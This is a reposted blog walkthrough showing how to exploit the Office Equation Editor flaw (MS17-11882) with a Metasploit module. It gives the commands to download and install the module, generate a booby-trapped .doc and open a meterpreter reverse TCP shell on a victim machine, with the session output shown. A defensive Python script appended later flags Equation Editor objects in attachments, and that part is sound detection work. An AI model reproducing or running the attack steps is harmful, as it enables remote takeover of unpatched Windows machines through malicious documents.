This is a remote code execution vulnerability that lay dormant for 17 years. It affects every currently popular version of Office. The flaw lives in one Office component, EQNEDT32.EXE, the Equation Editor. For the technical details, see this FreeBuf article.
Now for the attack. First download the Metasploit exploit module:

    wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb

Then move it into the following directory:

    mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

Next, start Metasploit and enter:

    use exploit/windows/fileformat/office_ms17_11882

Then look at the module's options:
    msf exploit(office_ms17_11882) > show options

    Module options (exploit/windows/fileformat/office_ms17_11882):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       FILENAME                   yes       Filename to save as
       SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
       SRVPORT   8080             yes       The local port to listen on.
       SSL       false            no        Negotiate SSL for incoming connections
       SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
       URIPATH                    no        The URI to use for this exploit (default is random)

    Payload options (windows/x64/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST                      yes       The listen address
       LPORT     4444             yes       The listen port

    Exploit target:

       Id  Name
       --  ----
       0   Automatic
Set the name of the file to generate:

    set filename bboysoul.doc

Set the listening host IP:

    set lhost 192.168.1.102

Start the attack:

    exploit
    msf exploit(office_ms17_11882) > exploit
    [*] Exploit running as background job 0.
    [*] Started reverse TCP handler on 192.168.1.102:4444
    [*] Using URL: http://0.0.0.0:8080/xudLp3
    [*] Local IP: http://192.168.1.102:8080/xudLp3
    [*] Server started.
Afterwards a file named bboysoul.doc is generated in the current directory; open it on the victim machine.

Note that I used Office 2010 64-bit Professional on a 64-bit Windows 7 machine. In my testing, 32-bit Windows and 32-bit Office did not work. Then just open the file on the victim machine:

    msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Handling initial request from 192.168.1.113
    msf exploit(office_ms17_11882) > [*] 192.168.1.113    office_ms17_11882 - Stage two requested, sending...
    msf exploit(office_ms17_11882) > [*] Sending stage (205379 bytes) to 192.168.1.113
    [*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.113:49225) at 2017-11-25 05:31:10 -0500
    msf exploit(office_ms17_11882) > sessions

    Active sessions
    ===============

      Id  Type                     Information                               Connection
      --  ----                     -----------                               ----------
      1   meterpreter x64/windows  WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B  192.168.1.102:4444 -> 192.168.1.113:49225 (192.168.1.113)
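For the defending side, here is an added example that is not from the original post and is not part of Metasploit or Office: a small Python triage script that flags documents embedding an Equation Editor object, the object type that EQNEDT32.EXE handles and that the module above abuses. It assumes two well-known values not given in the post, the Equation.3 class identifier {0002CE02-0000-0000-C000-000000000046} and the "Equation Native" stream name, and the three sample files are constructed inline. Legitimate documents with typed equations also match, so a hit is a reason to inspect or quarantine an attachment, not proof of exploitation.

```python
import struct

# Class identifier of the Equation.3 COM object implemented by EQNEDT32.EXE
# (well-known value, assumed here; it does not appear in the post above).
EQUATION3_CLSID = "{0002CE02-0000-0000-C000-000000000046}"
# Stream that holds the equation data inside the embedded object; .doc files
# store stream names as UTF-16LE in the OLE directory.
EQUATION_NATIVE_STREAM = "Equation Native".encode("utf-16-le")
# ProgID of the object; appears in an RTF \objclass group and in the
# CompObj stream of an OLE file.
EQUATION3_PROGID = b"Equation.3"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def clsid_to_bytes(clsid: str) -> bytes:
    """Encode a textual GUID as the 16-byte little-endian form used in OLE structures."""
    d1, d2, d3, d4, d5 = clsid.strip("{}").split("-")
    return (struct.pack("<IHH", int(d1, 16), int(d2, 16), int(d3, 16))
            + bytes.fromhex(d4) + bytes.fromhex(d5))


def scan_document(data: bytes) -> dict:
    """Return the Equation Editor indicators found in the raw bytes of a file.

    Binary OLE (.doc) files carry the CLSID and stream name as raw bytes; RTF
    files carry the object as hex text plus an \\objclass name, so the CLSID is
    searched for in both its binary and its hex-text form.
    """
    clsid_bin = clsid_to_bytes(EQUATION3_CLSID)
    return {
        "ole_header": data.startswith(OLE_MAGIC),
        "rtf_header": data.startswith(b"{\\rtf"),
        "equation3_clsid": clsid_bin in data or clsid_bin.hex().encode() in data.lower(),
        "equation_native_stream": EQUATION_NATIVE_STREAM in data,
        "equation3_progid": EQUATION3_PROGID in data,
    }


def is_suspicious(data: bytes) -> bool:
    """True when any indicator of an embedded Equation Editor object is present."""
    hits = scan_document(data)
    return hits["equation3_clsid"] or hits["equation_native_stream"] or hits["equation3_progid"]


# Constructed sample inputs (not real files): a .doc-style blob with an embedded
# Equation.3 object, a benign .doc-style blob, and an RTF wrapper for the object.
SAMPLE_EQUATION_DOC = (OLE_MAGIC + b"\x00" * 32
                       + clsid_to_bytes(EQUATION3_CLSID) + b"\x00" * 8
                       + EQUATION_NATIVE_STREAM)
SAMPLE_BENIGN_DOC = OLE_MAGIC + b"\x00" * 32 + "WordDocument".encode("utf-16-le")
SAMPLE_RTF = (b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
              b"{\\*\\objdata 0105000002000000}}}")


if __name__ == "__main__":
    for name, blob in [("equation.doc", SAMPLE_EQUATION_DOC),
                       ("benign.doc", SAMPLE_BENIGN_DOC),
                       ("equation.rtf", SAMPLE_RTF)]:
        verdict = "SUSPICIOUS" if is_suspicious(blob) else "clean"
        print(name, verdict, scan_document(blob))
```

Run it on a directory of inbound attachments and route any match for analyst review. The byte search deliberately avoids a full OLE parser, so it also catches objects hidden in RTF or appended data, at the price of the false positives noted above; it is a mail-gateway or sandbox pre-filter, not a replacement for patching the Office installs such as the unpatched Office 2010 used in the walkthrough.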
Welcome to follow Bboysoul's blog.

Have Fun

Reprinted from: http://zgykm.baihongyu.com/